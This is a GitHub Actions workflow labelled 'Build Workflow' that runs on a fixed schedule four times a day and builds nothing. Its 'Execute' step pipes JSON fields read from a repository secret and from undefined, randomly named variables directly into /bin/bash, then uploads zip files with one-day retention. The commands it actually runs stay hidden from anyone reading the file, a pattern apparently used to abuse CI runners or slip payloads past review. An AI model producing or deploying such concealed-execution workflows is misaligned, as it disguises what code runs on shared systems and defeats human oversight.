name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '56 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          jl189: ${{ secrets.jl189 }}
        run: |
          printf '%s' "$jl189" | jq -r .v586 | /bin/bash
          echo $iz202 | jq -r .i5 | /bin/bash
          printf '%s' "$kqp107" | jq -r .san7280 | /bin/bash
          printf '%s' "$yzks75049" | jq -r .zmj8 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: Oecyidux
          path: "*.zip"
          retention-days: 1
